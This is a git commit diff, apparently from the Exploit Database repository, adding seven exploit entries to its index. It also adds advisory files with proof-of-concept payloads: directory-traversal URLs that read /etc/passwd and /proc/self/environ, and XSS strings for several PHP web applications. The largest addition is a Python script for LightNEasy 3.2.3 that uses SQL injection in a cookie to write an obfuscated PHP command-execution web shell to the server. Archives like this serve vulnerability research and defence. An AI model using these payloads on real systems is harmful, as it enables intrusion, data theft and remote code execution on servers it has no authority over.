Update: 2014-12-30
7 new exploits
This commit is contained in:
parent
fa9aebca13
commit
5ab0a9cb63
9 changed files with 156 additions and 1 deletions
|
@ -8,7 +8,7 @@ id,file,description,date,author,platform,type,port
|
|||
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
|
||||
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
|
||||
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
|
||||
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
|
||||
|
@ -32106,3 +32106,10 @@ id,file,description,date,author,platform,type,port
|
|||
35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
|
||||
35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
|
||||
35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
|
||||
35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0
|
||||
35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 'module' Parameter Cross Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0
|
||||
35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0
|
||||
35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 '_zp_themeroot' Parameter Multiple Cross Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 'lang' Parameter Cross Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0
|
||||
35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0
|
||||
35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 Local File Include and Cross Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,3 +1,6 @@
|
|||
# Mirror: http://pastebin.com/raw.php?i=CZChGAnG
|
||||
# Video: https://www.youtube.com/watch?v=V7bnLOohqqI
|
||||
|
||||
#!/usr/bin/python
|
||||
#-*- coding: utf-8 -*
|
||||
|
||||
|
|
10
platforms/linux/remote/35644.txt
Executable file
10
platforms/linux/remote/35644.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/47509/info
|
||||
|
||||
Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||
|
||||
Viola DVR VIO-4/1000 is vulnerable; other products may also be affected.
|
||||
|
||||
http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
|
||||
http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd
|
9
platforms/php/webapps/35645.txt
Executable file
9
platforms/php/webapps/35645.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47519/info
|
||||
|
||||
Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?module=<script>alert(8888)</script>
|
9
platforms/php/webapps/35647.txt
Executable file
9
platforms/php/webapps/35647.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47526/info
|
||||
|
||||
SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
|
||||
http://www.example.com/index.php?menu=../../../proc/self/environ
|
||||
http://www.example.com/index1.php?menu=../../../etc/passwd
|
11
platforms/php/webapps/35648.txt
Executable file
11
platforms/php/webapps/35648.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/47528/info
|
||||
|
||||
Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
|
||||
|
||||
http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
|
9
platforms/php/webapps/35649.txt
Executable file
9
platforms/php/webapps/35649.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47540/info
|
||||
|
||||
todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
todoyu 2.0.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
|
84
platforms/php/webapps/35650.py
Executable file
84
platforms/php/webapps/35650.py
Executable file
|
@ -0,0 +1,84 @@
|
|||
source: http://www.securityfocus.com/bid/47541/info
|
||||
|
||||
LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
LightNEasy 3.2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
# ------------------------------------------------------------------------
|
||||
# Software................LightNEasy 3.2.3
|
||||
# Vulnerability...........SQL Injection
|
||||
# Threat Level............Critical (4/5)
|
||||
# Download................http://www.lightneasy.org/
|
||||
# Discovery Date..........4/21/2011
|
||||
# Tested On...............Windows Vista + XAMPP
|
||||
# ------------------------------------------------------------------------
|
||||
# Author..................AutoSec Tools
|
||||
# Site....................http://www.autosectools.com/
|
||||
# Email...................John Leitch <john@autosectools.com>
|
||||
# ------------------------------------------------------------------------
|
||||
#
|
||||
#
|
||||
# --Description--
|
||||
#
|
||||
# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
|
||||
# extract arbitrary data. In some environments it may be possible to
|
||||
# create a PHP shell.
|
||||
#
|
||||
#
|
||||
# --PoC--
|
||||
|
||||
import socket
|
||||
|
||||
host = 'localhost'
|
||||
path = '/lne323'
|
||||
shell_path = '/shell.php'
|
||||
port = 80
|
||||
|
||||
def upload_shell():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.settimeout(8)
|
||||
|
||||
s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
|
||||
'Host: localhost\r\n'
|
||||
'Proxy-Connection: keep-alive\r\n'
|
||||
'User-Agent: x\r\n'
|
||||
'Content-Length: 73\r\n'
|
||||
'Cache-Control: max-age=0\r\n'
|
||||
'Origin: null\r\n'
|
||||
'Content-Type: multipart/form-data; boundary=----x\r\n'
|
||||
'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
|
||||
'Accept: text/html\r\n'
|
||||
'Accept-Language: en-US,en;q=0.8\r\n'
|
||||
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
|
||||
'\r\n'
|
||||
'------x\r\n'
|
||||
'Content-Disposition: form-data; name="submit"\r\n'
|
||||
'\r\n'
|
||||
'\r\n'
|
||||
'------x--\r\n'
|
||||
'\r\n')
|
||||
|
||||
resp = s.recv(8192)
|
||||
|
||||
http_ok = 'HTTP/1.1 200 OK'
|
||||
|
||||
if http_ok not in resp[:len(http_ok)]:
|
||||
print 'error uploading shell'
|
||||
return
|
||||
else: print 'shell uploaded'
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.settimeout(8)
|
||||
|
||||
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
|
||||
'Host: ' + host + '\r\n\r\n')
|
||||
|
||||
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
|
||||
else: print 'shell located at http://' + host + shell_path
|
||||
|
||||
upload_shell()
|
||||
|
13
platforms/php/webapps/35651.txt
Executable file
13
platforms/php/webapps/35651.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/47542/info
|
||||
|
||||
Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.
|
||||
|
||||
The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Dolibarr 3.0.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
|
||||
|
||||
http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
Loading…
Add table
Reference in a new issue